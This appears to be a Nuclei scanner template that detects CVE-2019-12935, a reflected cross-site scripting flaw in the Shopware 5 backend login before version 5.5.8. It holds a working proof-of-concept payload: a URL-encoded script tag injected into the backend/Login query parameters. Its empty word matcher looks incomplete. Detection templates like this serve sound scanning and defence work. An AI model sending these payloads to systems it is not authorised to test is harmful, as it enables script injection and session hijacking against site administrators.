Shopware 5 - Backend (c) shopware AG

id: CVE-2019-12935 info: name: Shopware < 5.5.8 - Cross-Site Scripting author: pussycat0x severity: high description: | Shopware before 5.5.8 contains a reflected cross-site scripting (XSS) caused by unsanitized query string parameters in the backend/Login or backend/Login/load/ URI, letting attackers execute arbitrary scripts in the context of the victim's browser, exploit requires sending crafted URL to the victim. impact: | Attackers can execute malicious scripts in the victim's browser, potentially leading to session hijacking or defacement. remediation: | Update to version 5.5.8 or later. reference: - https://www.miggo.io/vulnerability-database/cve/CVE-2019-12935 - https://nvd.nist.gov/vuln/detail/CVE-2019-12935 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N cvss-score: 7.4 cve-id: CVE-2019-12935 epss-score: 0.0358 epss-percentile: 0.8795 cwe-id: CWE-79 metadata: verified: false max-request: 2 tags: cve,cve2019,shopware,xss flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/admin" - "{{BaseURL}}/backend" stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - "status_code == 200" - "contains_any(body, 'Realisiert mit Shopware','Realised with Shopware','Shopware Administration (c) shopware AG','Shopware 5 - Backend (c) shopware AG','Shopware.Application.start')" condition: and internal: true - method: GET path: - "{{BaseURL}}/backend/Login?error=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/backend/Login/load/?param=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "" - type: status status: - 200 - 401 condition: or # digest: 4a0a00473045022100cda9118bac1da1fab9dc06a3fe7e632442e5c60279d7fdcbfb0dc767d16a466502201712f757a4677e28f6b8479be676ecaeab2ac41d9a6b0fd3e64f1caf0b9f05ae:922c64590222798bb761d5b6d8e72950